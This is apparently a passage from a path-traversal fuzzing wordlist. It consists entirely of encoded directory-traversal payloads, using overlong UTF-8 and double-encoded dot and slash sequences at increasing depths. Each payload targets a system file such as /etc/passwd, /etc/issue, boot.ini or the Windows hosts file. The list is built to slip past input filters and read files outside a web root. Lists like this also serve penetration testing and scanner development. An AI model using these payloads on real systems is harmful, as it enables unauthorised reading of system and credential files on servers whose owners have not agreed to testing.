-%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66boot.ini -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66passwd -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66issue -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66boot.ini -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ae%c0%ae%%35%%63etc%%35%%63passwd -%c0%ae%c0%ae%%35%%63etc%%35%%63issue -%c0%ae%c0%ae%%35%%63boot.ini -%c0%ae%c0%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63passwd -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63issue -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63boot.ini -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63passwd -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63issue -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63boot.ini -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63passwd -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63issue -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63boot.ini -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63passwd -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63issue -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63boot.ini -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63passwd -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63etc%%35%%63issue -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63boot.ini -%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63%c0%ae%c0%ae%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -%c0%ae%c0%ae%e0%80%afetc%e0%80%afpasswd -%c0%ae%c0%ae%e0%80%afetc%e0%80%afissue -%c0%ae%c0%ae%e0%80%afboot.ini -%c0%ae%c0%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afpasswd -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afissue -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afboot.ini -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afpasswd -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afissue -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afboot.ini -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afpasswd -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afissue -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afboot.ini -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afpasswd -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afissue -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afboot.ini -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afpasswd -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afetc%e0%80%afissue -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afboot.ini -%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%af%c0%ae%c0%ae%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -%c0%ae%c0%ae%25c1%259cetc%25c1%259cpasswd -%c0%ae%c0%ae%25c1%259cetc%25c1%259cissue -%c0%ae%c0%ae%25c1%259cboot.ini -%c0%ae%c0%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cpasswd -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cissue -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cboot.ini -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cpasswd -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cissue -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cboot.ini -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cpasswd -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cissue -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cboot.ini -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cpasswd -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cissue -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cboot.ini -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cpasswd -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cetc%25c1%259cissue -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cboot.ini -%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259c%c0%ae%c0%ae%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -%c0%ae%c0%ae%25c0%25afetc%25c0%25afpasswd -%c0%ae%c0%ae%25c0%25afetc%25c0%25afissue -%c0%ae%c0%ae%25c0%25afboot.ini -%c0%ae%c0%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afpasswd -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afissue -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afboot.ini -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afpasswd -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afissue -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afboot.ini -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afpasswd -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afissue -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afboot.ini -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afpasswd -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afissue -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afboot.ini -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afpasswd -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afetc%25c0%25afissue -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afboot.ini -%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25af%c0%ae%c0%ae%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afissue -%c0%ae%c0%ae%f0%80%80%afboot.ini -%c0%ae%c0%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afissue -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afboot.ini -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afissue -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afboot.ini -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afissue -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afboot.ini -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afissue -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afboot.ini -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afpasswd -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afetc%f0%80%80%afissue -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afboot.ini -%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%af%c0%ae%c0%ae%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ae%c0%ae%f8%80%80%80%afboot.ini -%c0%ae%c0%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afboot.ini -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afboot.ini -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afboot.ini -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afboot.ini -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afetc%f8%80%80%80%afissue -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afboot.ini -%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%af%c0%ae%c0%ae%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0%5e%c0%5e/etc/passwd -%c0%5e%c0%5e/etc/issue -%c0%5e%c0%5e/boot.ini -%c0%5e%c0%5e/windows/system32/drivers/etc/hosts -%c0%5e%c0%5e/%c0%5e%c0%5e/etc/passwd -%c0%5e%c0%5e/%c0%5e%c0%5e/etc/issue -%c0%5e%c0%5e/%c0%5e%c0%5e/boot.ini -%c0%5e%c0%5e/%c0%5e%c0%5e/windows/system32/drivers/etc/hosts -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/passwd -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/issue -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/boot.ini -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/windows/system32/drivers/etc/hosts -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/passwd -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/issue -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/boot.ini -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/windows/system32/drivers/etc/hosts -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/passwd -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/issue -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/boot.ini -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/windows/system32/drivers/etc/hosts -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/passwd -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/etc/issue -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/boot.ini -%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/%c0%5e%c0%5e/windows/system32/drivers/etc/hosts -%c0%5e%c0%5e\etc\passwd -%c0%5e%c0%5e\etc\issue -%c0%5e%c0%5e\boot.ini 